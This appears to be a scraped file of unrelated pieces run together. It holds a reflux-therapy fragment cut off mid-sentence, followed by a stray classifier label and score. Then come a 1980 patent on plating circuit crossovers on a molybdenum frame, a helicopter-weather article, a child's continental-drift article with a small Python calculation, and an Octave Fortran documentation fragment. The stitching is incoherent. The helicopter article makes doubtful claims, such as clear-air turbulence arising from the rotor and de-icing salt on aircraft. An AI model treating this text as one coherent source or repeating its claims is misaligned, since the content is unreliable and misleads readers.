last updated 09-02-2023 Gastro-oesophageal reflux Reflux disease This figure shows the common causes of gastro-oesophageal reflux disease. These include a lack of saliva, poor peristaltic movement through the oesophagus, decreased lower oesophageal sphincter (LES) pressure, transient episodes of LES relaxation, delayed gastric emptying, and increased gastric acid. Therapy is aimed at decreasing gastrointestinal gastric acid, increasing gastric motility, or increasing LES tone. 1 Acid-reducing therapy should aim at high pH levels in order to inactivate pepsin. This is usually obtained at pH levels above:
__label__pos
0.622853
Additive method of forming circuit crossovers (Patent 4200975) Patent Drawings: 4200975-2, 4200975-3 (2 images) Inventor: Debiec, et al. Date Issued: May 6, 1980 Application: 05/910,989 Filed: May 30, 1978 Inventors: Debiec; Richard P. (LaGrange Park, IL) Wydra; William T. (Darien, IL) Assignee: Western Electric Company, Incorporated (New York, NY) Primary Examiner: Husar; Francis S. Assistant Examiner: Arbes; C. J. Attorney Or Agent: Bergum; K. R. U.S. Class: 257/763; 257/776; 257/E23.17; 29/827; 29/842; 29/847; 427/125; 427/97.4 Field Of Search: 29/625; 29/628; 29/629; 357/68; 357/65; 164/97; 164/98; 164/75; 164/14; 427/272; 427/282; 427/286; 427/287; 427/96; 427/125 International Class: U.S Patent Documents: B231416; 2629907; 3461524; 3562040; 3597839; 3667988; 3729816; 4000054; 4054484 Foreign Patent Documents: Other References: Western Electric Engineer, vol. XX, No. 2, pp. 3-6, Apr. 1976. Abstract: Through the use of a uniquely constructed molybdenum frame, a completely additive fabrication method may advantageously be employed to form an array of minute interconnecting circuit crossovers directly on the frame, using photolithographic and plating processes, with the requisite arches of the crossovers being directly formed within specially configured grooves of the frame during the plating operation. The frame is thereafter initially used as a temporary crossover carrier member, and subsequently as a bonding member during the thermo-compression bonding of the individual crossovers to respectively associated bond sites of the circuit, which typically may be of the integrated thin or thick film type. Such a simplified additive crossover generating technique advantageously obviates the need of not only potentially circuit-damaging chemical etching operations, but the many associated processing and handling steps associated therewith. Claim: We claim: 1. A method of forming a circuit crossover, with an arched intermediate region, for subsequent use in crossing over an intervening circuit element of a substrate-supported circuit, comprising the steps of: forming a mask-defined, exposed area on one planar surface of a frame member such that said exposed area extends across and a predetermined distance beyond opposite sides of a groove, previously formed with a concave base, in the one surface of the frame member; plating said exposed surface area of said frame member to form a metallic crossover, of predetermined thickness, with two planar end regions interconnected by an intermediate arched region, the latter being formed within the concave base of said groove, said completely formed crossover thereafter remaining on the frame member until subsequently transferred to an associated circuit. 2. A method in accordance with claim 1 further comprising the step of removing said mask prior to the time when said formed crossover is transferred to an associated circuit. 3. 
A method in accordance with claim 1 wherein a predetermined mask-defined, patterned array of exposed areas are formed on said one planar surface of the frame member such that each exposed area extends across and a predetermined distancebeyond opposite sides of a different one of a plurality of spaced, parallel extending grooves, previously formed with concave bases, in the one surface of the frame member, and wherein a metallic crossover is plated on each exposed surface area of saidframe member so as to simultaneously form an array thereof for subsequent transfer to an associated circuit. 4. A method in accordance with claim 3 further comprising the step of removing said mask-defined pattern from said frame member prior to the time when said arrray of formed crossovers are transferred to an associated circuit. 5. A method in accordance with claim 2 further comprising the steps of: aligning the terminating end regions of said plated crossover formed on the frame member with spaced and respectively associated circuit elements forming bond sites of a substrate-supported circuit; bonding the terminating end regions of the crossover to the respectively aligned bond sites of the circuit such that the bond strength between the crossover and the circuit is considerably greater than the plated bond strength initiallyestablished between the crossover and the frame member, and removing the frame member from the circuit bonded crossover, for reuse. 6. A method in accordance with claim 4 further comprising the steps of: aligning the terminating end regions of each of the array of plated crossovers formed on said frame member with spaced and respectively associated bond sites of the circuit; bonding the terminating end regions of each crossover to the respectively aligned bond sites of the circuit such that the bond strength between each crossover and the circuit is considerably greater than the plated bond strength initiallyestablished between each crossover and the frame member, and removing the frame member from the array of circuit-bonded crossovers, for reuse. 7. A method in accordance with claim 6 wherein said mask-defined pattern is formed by a photolithographic process, and wherein said plating step comprises a series of plating operations that form a composite multi-layered crossover, each layerbeing comprised of a different metallic material, with the outer layer being gold. 8. A method in accordance with claim 7 wherein said frame member is made of a thin sheet of molybdenum, and said circuit comprises a thin film circuit fabricated on a high alumina ceramic substrate. 9. 
A method of fabricating an array of circuit crossovers, with arched intermediate regions, on a substrate-supported circuit, comprising the steps of: forming a predetermined mask-defined, patterned array of exposed areas on one surface of a frame member such that each exposed area extends across and a predetermined distance beyond opposite sides of a different one of a plurality of grooves,each previously formed with a concave base, in the one surface of the frame member; plating each exposed surface area of said frame member to form a metallic crossover, of predetermined thickness, with two planar end regions interconnected by an intermediate arched region, the latter being formed within the concave base of eachgroove; removing said mask-defined pattern from said frame member; aligning the terminating end regions of each of the array of plated crossovers formed on said frame member with spaced and respectively associated bond sites of the circuit; bonding the terminating end regions of each crossover to the respectively aligned bond sites of the circuit such that the bond strength between each crossover and the circuit is considerably greater than the plated bond strength initiallyestablished between each crossover and the frame member, and removing the frame member from the array of circuit-bonded crossovers, for reuse. 10. A method in accordance with claim 9 wherein said mask-defined pattern is formed by a photolithographic process. 11. A method in accordance with claim 10 wherein said frame member is made of a thin sheet of molybdenum, and said circuit comprises a thin film circuit fabricated on a high alumina ceramic substrate. 12. A method in accordance with claim 9 wherein said plating step comprises a series of plating operations that form composite multi-layered crossovers, each crossover layer being comprised of a different metallic material, with the outer layerbeing gold. 13. A method in accordance with claim 9 wherein said crossover plating step involves plating a first layer of nickel, an intermediate layer of copper and an outer exposed layer of gold on each mask-exposed area of said frame. 14. A method in accordance with claim 12 wherein said crossover plating step further includes the step of plating a thin layer of indium on the outer layer of gold. 15. A method in accordance with claim 9 wherein said bonding step involves the application of predetermined heat and pressure to said aligned and contacting frame and circuit so as to effect thermo-compression bonds between each of saidcrossovers and the respectively associated bond sites of said circuit. 16. A method in accordance with claim 15 wherein a compensating member is interposed between the backside of said circuit substrate and a driving member of a bonder so as to compensate for dimensional variations in said substrate and to,thereby, impart substantially uniform bonding pressure to all of said crossovers simultaneously. Description: BACKGROUND OF THE INVENTION 1. Field of the Invention This invention relates to the fabrication of integrated circuits, such as of the thin film integrated circuit type and, more particularly, to the fabrication of circuit crossovers, and the subsequent bonding thereof to respectively associatedbond sites of the circuit. 2. 
Description of the Prior Art With the ever increasing complexity and density of integrated circuitry processed and/or fabricated on ceramic substrates, the need for interconnecting circuit "crossovers", of three-dimensional configuration, have often proven essential in orderto optimize the utilization of substrate surface area. As the name implies, a crossover essentially comprises a bridge-like element which allows different portions of a circuit, such as two spaced bonding pads or sites, to be interconnected, while anintermediate portion of the crossover extends out of the otherwise uniform plane of the circuit so as to bridge an intervening metallized circuit path or element. The complexity of the problem of fabricating and bonding an array of crossovers to an otherwise completely fabricated integrated circuit may be appreciated by the following typical example. In one representative hybrid integrated circuit packemployed in an electronic telephone switching system, the supporting ceramic substrate measures 31/4".times.4", with not only dozens of individual silicon integrated circuits and 92 lead connections, but over 4,000 crossovers. Each crossover typicallymeasures from 4 to 6 mils in width, 40 to 80 mils in length, and 25 to 50 microns in thickness, with an intermediate bowed region having an arch height on the order of 3 mils, and with the spacings between crossovers often being as close as 12 mils,center to center. One prior method of fabricating such crossovers is dislcosed in U.S. Pat. No. 3,461,524, of M. P. Lepselter, assigned to Bell Telephone Laboratories. In that method, generally referred to as a plated beam method, an intermediate conductivelayer, such as of copper, is initially deposited over each circuit element which is to be crossed over, or bridged, and an outer conductive layer, such as of gold, is then deposited over the intermediate layer and onto selected areas of differentportions of the circuit which are to be interconnected on opposite sides of each circuit element to be bridged. The intermidiate material is then removed so as to leave an air dielectric between each crossover and the bridged circuit element. Ifdesired, a permanent solid dielectric can be deposited between the formed crossovers and respectively bridged circuit elements. A similar technique for fabricating plated beam type crossovers is disclosed in an article entitled "Batch Bonded Crossoversfor Thin Film Circuits", published in the Western Electric Engineer, Vol. XX, No. 2, April 1976. U.S. Pat. No. 4,054,484 of N. G. Lesh et al., also assigned to Bell Telephone Laboratories, discloses a crossover fabrication technique wherein evaporated layers of titanium and copper are used as base layers to build up a beam-type crossoverspacing layer. A nickel protective layer is formed over the evaporated layers, as well as over the circuit areas initially formed on the substrate. A copper spacing layer is then plated over the nickel layer. Spaced pairs of pillar holes are thenetched in selected areas of both the copper spacing layer and the nickel protective layer to expose spaced regions of the initially formed circuit therebelow to be interconnected. This is followed by forming the desired interconnecting gold crossoverson the copper spacing layer. The copper spacing layer is finally removed by an etchant which preferentially attacks the copper. The nickel protective layer and the copper base layers are also removed, preferably with the same etchant. 
While the aforementioned plated beam crossover techniques are capable of producing well-defined and extremely minute crossovers, such techniques do give rise to several potentially serious manufacturing problems. First, the processing stepsrequired are both time consuming and costly. Secondly, the etchants required to remove selected material to form the plated beam type crossovers may often be incompatible with other circuit materials and/or devices forming the composite circuit, therebypossibly resulting in damage to the circuit, even when great care is taken in the fabricating, as well as handling, of the circuit. With respect to handling, it is readily apparent that the more times the circuit and/or crossovers must be manipulated incarrying out the necessary processing steps, the more susceptible is the circuit to damage. Thirdly, it will be appreciated that there is no simple, reliable way of testing whether plated beam type crossovers are adequately secured to the circuit, as itwould be extremely difficult, as well as time consuming and expensive, to test the bond strength of such crossovers on either an individual or random basis. Moreover, even if random testing were employed, it is very difficult to perform peel tests onplated-beam type crossovers without either destroying the bonds, or otherwise damaging the crossovers. As a result of the problems and costs encountered in fabricating plated-beam type crossovers, a batch bonded method was developed and is disclosed in J. A. Burns et al. U.S. Pat. No. 3,762,040, assigned to the same assignee as the presentinvention. In accordance with one preferred version of this last-mentioned method, an array of metallic crossovers are initially formed as minute bars, i.e., without arched regions, on a carrier member, such as a copper-polyimide laminated film, inaccordance with any one of a number of conventional mask-defined, metal plating techniques. The resultant array of two-dimensional plated crossovers are thereafter formed, in conjunction with a specially constructed backing member (having an array ofslos that correspond with the generated array of crossovers), by an extrusion or deformation technique either prior to or during the subsequent bonding of the crossovers to a circuit. This technique is also disclosed in the aforementioned WesternElectric Engineer article. J. A. Burns U.S. Pat. No. 3,729,816, also assigned to the same assignee as the present invention, discloses the use of a batch bonded technique for generating temporary crossovers for use in the electrical testing of portions of a thin filmcircuit during the fabrication thereof. The prior batch bonded crossover method has a number of advantages over the plated-beam crossover method. First, the number of photoresist, plating and etching steps are considerably reduced. This leads to lower fabrication costs, and oftenhigher yields. Higher yields are also more often realized with the prior batch bonded versus plated beam crossover fabrication method because the former method is carried out completely independently of the considerably more expensive thin filmcircuit-generating method. As a result, both the fabricated crossover array and the associated integrated circuit may be independently examined for defects prior to the crossovers being bonded to the circuit as the last, or one of the last, stepsinvolved in the fabrication of a complete, composite circuit. 
Notwithstanding the significant advantages realized by utilizing the prior batch bonded crossover method, the fact remains that it has nevertheless still proven to be a relatively costly method, primarily because of not only the necessity ofhaving to use a rather expensive copper-polyimide laminate carrier, but because of the attendant photoresist and chemical etching steps required to generate the array of crossovers, not to mention the additional steps involved to form the arched regionsthereof. In addition, when the etched window backing member, employed to form the crossover arches, is also used as a temporary frame for the copper-polyimide film, and is preferably made of molybdenum (for reasons discussed in greater detailhereinafter), the cumulative exposure thereof to the necessary copper etchant unfortunately has been found to limit its life to about fifty operating cycles. As such backing members, particularly when formed with complex arrays of precision formedetched windows, are rather expensive, it is seen that their periodic replacement costs alone may constitute an appreciable portion of the overall costs of fabricating thin film integrated circuits, with batch-bonded crossovers of the type in question, inhigh volume manufacturing operations. SUMMARY OF THE INVENTION It, therefore, is an object of the present invention to generate an array of circuit crossovers, and thereafter bond them simultaneously to respectively associated bonding sites of an integrated circuit, in a simplified, inexpensive and reliablemanner, by obviating the need during the fabrication of the crossovers of any chemical etchants, or of a costly copper-polyimide laminate, as well as of any separate crossover deformation or extrusion steps to produce the requisite arches therein eitherbefore or during the bonding thereof to the circuit. In accordance with the principles of the present invention, the above and other objects are realized by utilizing a completely additive method, and a specially constructed molybdenum frame, to fabricate, through a plating operation, an array ofcircuit crossovers, with the necessary arches, directly on the frame. Thereafter, the completely fabricated array of crossovers are transferred en masse from the frame to, and simultaneously bonded on, respectively associated circuit pads or bond sitesof an otherwise completely fabricated integrated circuit, such as of the thin or thick film type. In order to carry out such a unique crossover fabrication method, the crossover-supporting frame is initially constructed with a plurality of parallelextending grooves on at least one side thereof, with the grooves each having a concave or semi-circular base. With the normal gold-to-gold bonds established between each fabricated crossover and the associated circuit bond sites producing peel strengths considerably greater then those initially established between each plated crossover and the frame, thelatter may be advantageously cleanly peeled from the array of circuit-bonded crossovers for reuse. This peeling step advantageously also inherently provides a reliable way of testing the adequacy of the permanent bonds. Even more significant, however, are the appreciable cost savings realized in fabricating crossovers in accordance with the subject method, and specially constructed molybdenum frame. 
More specifically, the present invention obviates the priortime consuming and costly series of photolithographic processing steps performed either directly on the integrated circuit substrate (in forming plated beam crossovers), or indirectly on a rather expensive copper/polyimide laminate (in forming priorbatch bonded crossovers). In the latter case, of course, the actual forming of the arches also involves a number of additional steps, the exact number depending on whether the arches are formed before or during the bonding of the crossovers to thecircuit. Further indirect cost savings are realized in accordance with the present invention, as compared to the prior batch bonded methods, by the considerably increased life of the molybdenum frames (or backing members) made possible by their nothaving to be subjected to any chemical etchants. BRIEF DESCRIPTION OF THE DRAWINGS FIG. 1 is an enlarged, fragmentary perspective view illustrating the molybdenum frame formed with a patterned array of concave grooves on one side thereof, which grooves allow the intermediate arches of a patterned array of associated crossoversto be formed directly therein at the same time that the integral planar end portions of the crossovers are being formed during a common plating operation, through a suitable photo-resist mask (not shown), in accord with the principles of the presentinvention; FIG. 2 is an end view of the molybdenum frame, which functions not only as a temporary carrier for each successive array of crossovers previously plated on the grooved side thereof, but as a bonding member when positioned in proper alignment withan associated circuit, such as of the thin film type, previously fabricated on a ceramic-supporting substrate; FIG. 3 is an enlarged, fragmentary perspective view of the thin film integrated circuit of FIG. 2, after an array of minute circuit crossovers (only three being shown) have been simultaneously bonded to respectively aligned bond sites formingpart of the circuit; FIG. 4 is a simplified side elevational view of a suitable illustrative fixture for aligning the bond sites on a typical substrate-supported integrated circuit relative to an array of associated crossovers fabricated and temporarily supported onthe subject grooved frame, and FIG. 5 is an enlarged, detail sectional view, taken along the line 5--5 of FIG. 1, illustrating one preferred type of multi-layered crossover. DETAILED DESCRIPTION OF THE INVENTION It should be appreciated that the methods and apparatus as embodied herein, and described in detail hereinbelow, have universal application in bonding metallic, interconnecting circuit crossovers to respectively associated bond sites on diversetypes of substrate-supported electrical circuits of not only the thin or thick film type, but also of the conventional printed circuit type, utilizing discrete and/or hybrid integrated circuit devices. For purposes of illustration, however, the subjectinvention is described herein in connection with one preferred application, namely, in generating an array of minute crossovers for use in completing interconnections on a ceramic substrate-supported thin film circuit. With particular reference first to FIG. 1, a substantially planar frame member 10, hereinafter simply refered to as the frame, is formed on at least one side 11 with a plurality of spaced, parallel extending grooves 12, each having a concave, orsemi-circular base 13. 
The frame 10 is uniquely employed in generating an array of minute conductive circuit crossovers 16, with arched intermediate regions 16a, on the grooved side 11 thereof. Considered more specifically, the uniquely constructed frame 10 allows an array of crossovers 16 to be fabricated in accordance with a completely additive process, i.e., the crossovers are directly plated, through a patterned photoresist-appliedmask (not shown), directly on the grooved side 11 of the frame 10, with no chemical etching operations being required. With the crossover-defined windows developed in the photoresist mask being oriented such that each window extends across, i.e.,perpendicularly to an associated groove 13 in the frame, the required intermediate arched region of each crossover is inherently formed within the associated concave groove 13 during the plating-formation of the crossovers. Considered another way, thecentral arched region 16a and the integral opposite end planar (two-dimensional) end regions 16b of each crossover are advantageously simultaneously formed during the common plated buildup thereof in accordance with the principles of the presentinvention. After the plating operation, and the removal of the photoresist by any conventional means, the generated array of frame-supported crossovers are aligned with, and simultaneously batch-bonded to, respectively associated bond sites 19 of anotherwise completely fabricated circuit 21, such as of the thin film integrated circuit type supported on a substrate 22, while positioned relative to each other as schematically illustrated in FIG. 2. With the frame 10 preferably being made of molybdenum, and with the bond sites of the circuit 21 normally having at least an upper exposed layer of gold, the bond strength between each crossover 16 and the associated bond sites 19 will beconsiderably greater than the plated bond strength initially established between each crossover and the frame 10. As such, the frame may be cleanly peeled from the array of circuit bonded crossovers for reuse, leaving the generated array of crossovers16 reliably and permanently secured to the respectively associated bond sites of the circuit 21, as illustrated in FIG. 3. Advantageously, as previously mentioned, the weaker bond strengths established between the frame 10 and crossovers 16 also inherently provide a reliable way of simultaneously testing the adequacy of the individual bonds established between eachcrossover and the pair of respectively associated bond sites of the circuit. Should any particular crossover not be satisfactorily bonded to a given circuit bond site, that crossover can be readily observed by reason of normally remaining on the frameand, in most cases, by also not being impaired during the peeling of the frame from the circuit, may be individually needle-bonded to the circuit as a final repair operation. Of course, should any crossover be ascertained to be defective, either as aresult of being unsatisfactorily formed during plating, or damaged during either the bonding operation or subsequent peeling of the frame from the circuit bonded crossovers, a new crossover may be readily substituted for the defective crossover. With respect to the crossover-supporting frame 10, molybdenum has been found to be the most advantageous choice of all possible frame materials available, for a number of reasons. 
First, the frame must remain hard and dimensionally stable during repeated use at elevated temperatures and pressures in order to function as a reliable bonding member, as illustrated in FIGS. 2 and 4. Dimensional stability is of particular importance when a randomly distributed array of crossovers, extending over a relatively large circuit surface area, are to be bonded to the circuit simultaneously, with uniform forces imparted thereagainst. Other attributes of molybdenum as the frame material relate to the fact that its thermal coefficient of expansion advantageously closely matches that of high alumina ceramic, which is a preferred integrated circuit substrate material. Molybdenum is also conducive to being chemically, as well as mechanically, milled at reasonable cost, and is resistant to attack by photolithographic processing chemicals.

With particular reference to the crossovers 16, they may be formed of solid gold, but preferably, and primarily because of cost, are formed as multi-layered elements, comprised, for example, of successive plated layers of Cu and Au, or Ni, Cu and Au. FIG. 5 illustrates one preferred form of the latter type of multi-layered crossover, comprised of an underlayer 23 of Ni, having a typical thickness of approximately 5-10 microns, an intermediate layer 24 of Cu, having a thickness of approximately 15-25 microns, and an outer layer 26 of soft gold, having a thickness of approximately 5-15 microns. In some applications it may be desirable to utilize a very thin outer layer of indium, such as in the range of 2-4 microns, in order to reduce the bonding pressure otherwise required to effect bonds with a given peel strength. A problem in using indium, however, is that it has a lower melting point than gold and, hence, has a tendency to flow beyond the bond site interfaces unless the bonding temperature and pressure are carefully controlled.

The degree of curvature of the arches formed in the crossovers will depend, of course, on the dimensions of both the crossovers and the circuit paths. With crossovers typically measuring 4 to 6 mils in width, 40 to 80 mils in length, and 25 to 50 microns in thickness, and with the circuit paths to be bridged in a typical thin film circuit measuring 5 to 30 mils in width, and 1 to 10 microns in thickness, it has been found that the grooves 12 in the frame should have a radius of curvature of approximately 4.5 mils. Such dimensioned grooves will produce plated crossover arches with a degree of bow that will reliably bridge the circuit paths in question. In general, for most integrated circuit applications such grooves will normally have a radius of curvature, or an otherwise configured maximum arch height, in the range of 3 to 7 mils, formed in a molybdenum frame having a correlated thickness in the range of 6 to 12 mils.

The step of aligning the array of frame-supported crossovers 16 with the circuit bond sites 19 may be accomplished in any suitable manner. For example, as illustrated in FIG. 4, a fixture 31, with a plurality of properly positioned locating pins 33, may be used for this purpose. By constructing the molybdenum frame 10 with a plurality of locating bores 36 that respectively correspond spatially with the locating pins 33, the frame 10 may be readily positioned on the fixture 31.
Should the frame be so thin for a given crossover fabrication application that adequate recessed bores 36 could not be formed therein, the frame could readily be dimensioned such that the bores would extend through the frame in a border region 10a thereof, shown in phantom in FIG. 4, that would protrude beyond the adjacent edge of the circuit substrate not used for alignment purposes. This would allow two or more locating pins 33' to extend completely through the frame without interfering with the positioning of the substrate-supported circuit on the frame.

Thereafter, the bond sites 19 of the circuit 21 may be readily aligned with the respectively associated crossovers 16 by initially forcing at least two edges of the circuit substrate 22 against at least three upwardly extending, fixture-supported locating pins 38, and subsequently lowering the substrate until contact is made between the respectively aligned crossovers and circuit bond sites. Such desired alignment may be temporarily retained by using a conventional adhesive, such as Rohm and Haas's Acryloid B7, applied, for example, to only diagonally opposed corners (not shown) of the frame 10 prior to positioning the circuit substrate 22 thereon.

As thus aligned and temporarily secured, the crossover-supporting frame 10 and circuit-supporting substrate 22 may be readily removed from the fixture 31, and inserted in a conventional thermo-compression bonder (not shown) to effect the permanent bonding of the crossovers 16 to the respectively associated circuit bond sites 19. One such bonder that is particularly adapted for this application is disclosed in the aforementioned Burns et al. U.S. Pat. No. 3,762,040.

In connection with whatever type of bonder is employed, it should be appreciated that due to dimensional variations in the substrate, it is extremely difficult to simultaneously bond an array of crossovers with relatively high pressure, such as in the range of 600-900 psi, to multiple circuit bond sites, extending over an appreciable area of a substrate, without inducing cracks therein. Such dimensional variations are often due to a lack of parallelism between the major surfaces caused by waviness, warpage, foreign particles, etc. In order to obviate such bonding-induced substrate cracking, a compensating member 42, symbolically shown in FIG. 2 and comprised, for example, of an aluminum screen, such as of 14 mesh wire, woven to have a thickness of 40 mils, sandwiched between two 3 to 5 mil thick molybdenum sheets, may be employed to compensate for any of the aforementioned types of dimensional variations in a given substrate. The outer molybdenum sheets are employed to prevent the bonding of the interposed screen to the ram of the bonder, or to the back major surface of the substrate, or both. The construction of such a composite compensating member is more fully described and disclosed in the aforementioned Burns et al. patent.

In a typical crossover bonding operation, it has been found that applying a bonder ram pressure of approximately 2,000 psi through the compensating member to the substrate, so as to establish a direct bond site/crossover interface bonding pressure on the order of 750 psi, at a temperature of approximately 350° C., and for a duration of about 35 seconds, will effect reliable bonding of the array of crossovers to the circuit bond sites.
This is particularly the case when the crossovers, as previously noted, are on the order of 40 to 80 mils in length, 4 to 6 mils in width, and 25 to 50 microns in thickness, with each crossover having a first underlayer of nickel, 5-10 microns, an intermediate layer of copper, 15-25 microns, and an outer layer of soft gold, 5-15 microns in thickness, and with the bond sites being formed with an approximately 12,000 angstrom layer of gold plated on about a 2,000 angstrom layer of palladium which, in turn, has about a 2,000 angstrom layer of titanium. Such circuit bond sites typically form extensions of associated thin film conductive circuit paths processed on high alumina substrates.

It should be appreciated, of course, that the degree of force and heat, as well as the duration thereof, required to effect thermo-compression bonds with a given bond strength may vary appreciably from the example given above when different types of mating interface materials are involved. By way of further illustration in this regard, for thin film resistors the circuit would typically comprise a multi-layered build-up of gold, palladium, titanium and tantalum nitride, whereas for thin film resistors and capacitors, the circuit would typically comprise a multi-layered build-up of gold, nichrome, gold, nichrome, tantalum nitride, beta tantalum and tantalum pentoxide.

With respect to bonding, it should also be apparent that other discrete circuit elements can be bonded to the substrate-supported circuit simultaneously with the bonding of the array of crossovers thereto. For example, if it is desired to bond one or more beam-leaded devices, or other types of integrated circuit chips (none shown) to the circuit, such devices may be temporarily secured by any suitable means, such as by an adhesive, within nesting regions (not shown) formed in the frame at the appropriate locations. These devices would thereafter be transferred to and bonded, together with the crossovers, to the common associated circuit. The recessed nesting regions would normally be required so that the devices would protrude above the planar surfaces on the grooved side of the frame only sufficiently to effect the bonding thereof to the circuit, while at the same time ensuring that the bonding forces imparted thereagainst would not damage the devices. The primary advantages in being able to bond not only the circuit crossovers, but any associated devices and/or components, to a common substrate-supported circuit simultaneously, are that not only would damage to the various circuit elements be minimized, primarily as a result of eliminating many otherwise necessary handling and positioning operations, but bonding costs would also be substantially reduced.

In summary, it has been shown that through the use of a uniquely constructed molybdenum frame, a completely additive fabrication method may advantageously be employed to form an array of minute interconnecting circuit crossovers directly on the frame, using photolithographic and plating processes, with the requisite arches of the crossovers being directly formed within specially configured grooves of the frame during the plating operation. The frame is thereafter initially used as a temporary crossover carrier member, and subsequently as a bonding member during the thermo-compression bonding of the individual crossovers to respectively associated bond sites of the circuit, which typically may be of the thin or thick film type.
Such a simplified additive crossover generating technique has been shown to make possible appreciable direct and indirect cost savings, and has the capability of significantly increasing circuit yields, over those realized with prior crossover fabrication processes, by obviating the need for not only potentially circuit-damaging chemical etching operations, but also the many processing and handling steps associated therewith.

* * * * *
Are Helicopters Affected by Weather?

Just like anything else flying in the sky, weather has a major impact on how a helicopter handles its flight. Bad weather conditions can jeopardize the safety of a helicopter, so it is important for pilots to be aware of the conditions. A safe flight requires good weather, but weather can change quickly, so pilots need to take extra precautions when bad weather hits.

Weather that affects a helicopter's flying and safety

Fog, Rain, and Snow
Fog, rain and snow affect a pilot's visibility, making these conditions very dangerous to fly in. It is safest to avoid flying in them altogether, so pilots and air traffic controllers should keep a close eye on the weather and know when to cancel flights.

Turbulence
Turbulence can occur in clear air, and can sometimes be missed by a helicopter's radar. Clear air turbulence usually happens in clear skies at high altitudes, and is caused by small-scale wind velocity gradients around the high-speed air of the helicopter's rotor. A pilot can learn to handle and get past this turbulence safely with a lot of experience and practice.

Frosty Weather
Frosty weather can be the most dangerous condition to fly in. It occurs when the air temperature is below freezing and the humidity level in the atmosphere is high, and it can lead to control problems and even crashes. All frost should be cleared off a helicopter before it takes flight, using substances such as antifreeze and de-icing salt.

Direction and Speed of the Wind
The wind's direction and speed play an important role in a helicopter's flight. A headwind flowing against the path of the helicopter pushes on the helicopter's nose and slows it down, while a tailwind pushes the helicopter along in the direction it is going. Strong or shifting winds can lead pilots to lose control of the helicopter and can cause accidents.
Why Do South America and Africa Fit Together Like Puzzle Pieces? The Two Continents Were Once Connected

by Lucy Benton, age 12

Two-hundred twenty million years ago the world looked very different. All the continents were joined together into one big land mass, called Pangea. A huge ocean, Panthalassa, surrounded Pangea. Two-hundred million years ago, the northern edge of Australia was connected to the southern edge of Africa. Today, South America and Africa could still fit together like pieces of a jigsaw puzzle.

Over millions of years the continents have moved thousands of miles from their position in Pangea. This movement is called continental drift. Even though we don't feel it, the continents are always moving; this is likely due to the pressure of the hot, molten rock moving beneath the Earth's surface. The movement of molten rock through the Earth's interior creates convection currents. These currents move the land above them at varying speeds. North America is drifting away from Europe at about one inch a year.

Continental drift is a result of a larger phenomenon called "plate tectonics." The Earth's surface is broken into about 20 tectonic plates. Tectonic plates are giant fragments of the Earth's surface. The continents actually sit on top of the tectonic plates and are carried along when their plate moves. The movement of these plates, which carry all of Earth's land masses and bodies of water, is responsible for earthquakes, volcanoes, mountains, and continental drift. When one plate crashes into another it can form high mountain ranges. For example, the Himalayan Mountains were created when India collided with Asia. The Himalayas are still getting higher today because India's plate is still pushing into Asia's. To learn more about tectonic plates, you can read Trinity's article.

The natural world is always changing, thanks to tectonic plates. In the future the Pacific Ocean is expected to shrink and the Atlantic Ocean will get wider. Africa may even split along the Great Rift Valley in the east.

[Source: The Big Book Of Knowledge]
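As a rough back-of-the-envelope check of the drift rate quoted above (about one inch a year), the short Python sketch below works out how far two continents would separate over 200 million years, roughly the time span the article discusses; the rate and time come from the article, and the rest is simple unit conversion.

inches_per_year = 1.0                      # drift rate quoted in the article
years = 200_000_000                        # approximate time since Pangea started breaking apart
inches_per_mile = 63_360                   # 5,280 feet times 12 inches
miles = inches_per_year * years / inches_per_mile
print(f"about {miles:,.0f} miles")         # roughly 3,200 miles, on the order of the Atlantic's width today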
GNU Octave  4.2.1 A high-level interpreted language, primarily intended for numerical computations, mostly compatible with Matlab  All Classes Namespaces Files Functions Variables Typedefs Enumerations Enumerator Properties Friends Macros Pages sstode.f Go to the documentation of this file. 1  SUBROUTINE sstode (NEQ, Y, YH, NYH, YH1, EWT, SAVF, ACOR, 2  1 wm, iwm, f, jac, pjac, slvs) 3 C***BEGIN PROLOGUE SSTODE 4 C***SUBSIDIARY 5 C***PURPOSE Performs one step of an ODEPACK integration. 6 C***TYPE SINGLE PRECISION (SSTODE-S, DSTODE-D) 7 C***AUTHOR Hindmarsh, Alan C., (LLNL) 8 C***DESCRIPTION 9 C 10 C SSTODE performs one step of the integration of an initial value 11 C problem for a system of ordinary differential equations. 12 C Note: SSTODE is independent of the value of the iteration method 13 C indicator MITER, when this is .ne. 0, and hence is independent 14 C of the type of chord method used, or the Jacobian structure. 15 C Communication with SSTODE is done with the following variables: 16 C 17 C NEQ = integer array containing problem size in NEQ(1), and 18 C passed as the NEQ argument in all calls to F and JAC. 19 C Y = an array of length .ge. N used as the Y argument in 20 C all calls to F and JAC. 21 C YH = an NYH by LMAX array containing the dependent variables 22 C and their approximate scaled derivatives, where 23 C LMAX = MAXORD + 1. YH(i,j+1) contains the approximate 24 C j-th derivative of y(i), scaled by h**j/factorial(j) 25 C (j = 0,1,...,NQ). on entry for the first step, the first 26 C two columns of YH must be set from the initial values. 27 C NYH = a constant integer .ge. N, the first dimension of YH. 28 C YH1 = a one-dimensional array occupying the same space as YH. 29 C EWT = an array of length N containing multiplicative weights 30 C for local error measurements. Local errors in Y(i) are 31 C compared to 1.0/EWT(i) in various error tests. 32 C SAVF = an array of working storage, of length N. 33 C Also used for input of YH(*,MAXORD+2) when JSTART = -1 34 C and MAXORD .lt. the current order NQ. 35 C ACOR = a work array of length N, used for the accumulated 36 C corrections. On a successful return, ACOR(i) contains 37 C the estimated one-step local error in Y(i). 38 C WM,IWM = real and integer work arrays associated with matrix 39 C operations in chord iteration (MITER .ne. 0). 40 C PJAC = name of routine to evaluate and preprocess Jacobian matrix 41 C and P = I - h*el0*JAC, if a chord method is being used. 42 C SLVS = name of routine to solve linear system in chord iteration. 43 C CCMAX = maximum relative change in h*el0 before PJAC is called. 44 C H = the step size to be attempted on the next step. 45 C H is altered by the error control algorithm during the 46 C problem. H can be either positive or negative, but its 47 C sign must remain constant throughout the problem. 48 C HMIN = the minimum absolute value of the step size h to be used. 49 C HMXI = inverse of the maximum absolute value of h to be used. 50 C HMXI = 0.0 is allowed and corresponds to an infinite hmax. 51 C HMIN and HMXI may be changed at any time, but will not 52 C take effect until the next change of h is considered. 53 C TN = the independent variable. TN is updated on each step taken. 54 C JSTART = an integer used for input only, with the following 55 C values and meanings: 56 C 0 perform the first step. 57 C .gt.0 take a new step continuing from the last. 58 C -1 take the next step with a new value of H, MAXORD, 59 C N, METH, MITER, and/or matrix parameters. 
